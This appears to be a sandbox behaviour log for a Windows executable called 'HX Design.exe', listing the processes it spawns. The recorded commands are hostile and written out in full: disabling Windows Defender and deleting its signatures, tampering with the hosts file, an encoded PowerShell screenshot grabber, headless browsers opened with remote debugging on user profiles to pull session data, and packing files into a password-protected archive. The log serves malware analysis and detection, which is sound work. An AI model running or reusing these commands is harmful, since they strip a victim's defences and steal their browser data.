Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\HX Design.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Users\user\Desktop\HX Design.exe "C:\Users\user\Desktop\HX Design.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.com	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
